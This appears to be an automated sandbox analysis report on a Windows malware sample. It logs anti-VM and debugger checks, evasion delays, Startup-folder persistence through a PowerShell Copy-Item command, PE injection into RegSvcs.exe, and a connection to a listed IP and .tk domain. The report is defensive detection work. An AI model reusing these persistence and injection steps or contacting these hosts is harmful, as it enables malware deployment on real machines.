Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: powershell.exe PID: 5224, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 3712, type: MEMORYSTR

Source: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe TID: 1632	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe TID: 5152	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5392	Thread sleep count: 8782 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5168	Thread sleep count: 42 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4636	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe TID: 1220	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe TID: 4888	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1004	Thread sleep count: 646 > 30	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8782			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 646			Jump to behavior

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: powershell.exe, 0000000B.00000003.602907132.00000000050C5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V
Source: powershell.exe, 0000000B.00000003.602907132.00000000050C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.634730844.0000000004ABB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.791732369.0000000004BF6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: /l:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
Source: RegSvcs.exe, 0000000D.00000002.776742894.0000000001182000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Anti Debugging

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe

Code function: 17_2_00EE29F8 CheckRemoteDebuggerPresent,

17_2_00EE29F8

Source: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Benign windows process drops PE files

Source: C:\Windows\System32\wscript.exe

File created: VNZVNCXKKJSF[1].exe.0.dr

Jump to dropped file

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\wscript.exe	Network Connect: 50.115.174.192 443			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Domain query: tgc8x.tk

Writes to foreign memory regions

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 456000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 46E000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 474000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 475000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 476000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 47B000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: FBC008	Jump to behavior

.NET source code references suspicious native API functions

Source: VNZVNCXKKJSF[1].exe.0.dr, A/cf8eb4e449d152e1244a7cf6f3ecbf85f.cs	Reference to suspicious API methods: ('c8f92d37f364a4b3f4c9b618271871080', 'OpenProcess@kernel32.dll'), ('ccaecc5f3aab7d34885801a7248d378a6', 'GetProcAddress@kernel32.dll'), ('c33d649923dd65766b0659ff6d06d3e2f', 'GetProcAddress@kernel32.dll'), ('cb3e0424c0f0b37fb10b8f77664b6a089', 'LoadLibrary@kernel32.dll'), ('c6d7ecd4297f948f6002efd9b02178408', 'GetProcAddress@kernel32.dll'), ('c6445e228c9a2151fd4f4723042b67082', 'GetProcAddress@kernel32.dll'), ('c1f649e2cef6b40b1d2fba8e895975ff7', 'GetProcAddress@kernel32.dll'), ('c64da5c618679bd4e6703fb08a405ef26', 'GetProcAddress@kernel32.dll')
Source: VNZVNCXKKJSF.exe.0.dr, A/cf8eb4e449d152e1244a7cf6f3ecbf85f.cs	Reference to suspicious API methods: ('c8f92d37f364a4b3f4c9b618271871080', 'OpenProcess@kernel32.dll'), ('ccaecc5f3aab7d34885801a7248d378a6', 'GetProcAddress@kernel32.dll'), ('c33d649923dd65766b0659ff6d06d3e2f', 'GetProcAddress@kernel32.dll'), ('cb3e0424c0f0b37fb10b8f77664b6a089', 'LoadLibrary@kernel32.dll'), ('c6d7ecd4297f948f6002efd9b02178408', 'GetProcAddress@kernel32.dll'), ('c6445e228c9a2151fd4f4723042b67082', 'GetProcAddress@kernel32.dll'), ('c1f649e2cef6b40b1d2fba8e895975ff7', 'GetProcAddress@kernel32.dll'), ('c64da5c618679bd4e6703fb08a405ef26', 'GetProcAddress@kernel32.dll')
Source: Systedbddfm.exe.11.dr, A/cf8eb4e449d152e1244a7cf6f3ecbf85f.cs	Reference to suspicious API methods: ('c8f92d37f364a4b3f4c9b618271871080', 'OpenProcess@kernel32.dll'), ('ccaecc5f3aab7d34885801a7248d378a6', 'GetProcAddress@kernel32.dll'), ('c33d649923dd65766b0659ff6d06d3e2f', 'GetProcAddress@kernel32.dll'), ('cb3e0424c0f0b37fb10b8f77664b6a089', 'LoadLibrary@kernel32.dll'), ('c6d7ecd4297f948f6002efd9b02178408', 'GetProcAddress@kernel32.dll'), ('c6445e228c9a2151fd4f4723042b67082', 'GetProcAddress@kernel32.dll'), ('c1f649e2cef6b40b1d2fba8e895975ff7', 'GetProcAddress@kernel32.dll'), ('c64da5c618679bd4e6703fb08a405ef26', 'GetProcAddress@kernel32.dll')

Allocates memory in foreign processes

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe "C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "Powershell" Copy-Item 'C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "Powershell" Copy-Item 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe'	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Jump to behavior

Source: VNZVNCXKKJSF.exe, 0000000A.00000002.414888406.00000000029A0000.00000004.00000800.00020000.00000000.sdmp, Systedbddfm.exe, 00000011.00000002.707496328.0000000002C50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: VNZVNCXKKJSF.exe, 0000000A.00000002.414888406.00000000029A0000.00000004.00000800.00020000.00000000.sdmp, Systedbddfm.exe, 00000011.00000002.707496328.0000000002C50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Progman
Source: RegSvcs.exe, 0000000D.00000002.775300132.0000000001167000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR\
Source: RegSvcs.exe, 0000000D.00000002.775300132.0000000001167000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerV,op"
Source: RegSvcs.exe, 0000000D.00000002.775300132.0000000001167000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerQ,pp!
Source: RegSvcs.exe, 0000000D.00000002.775300132.0000000001167000.00000004.00000020.00020000.00000000.sdmp, logs.dat.13.dr	Binary or memory string: [Program Manager]

Source: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
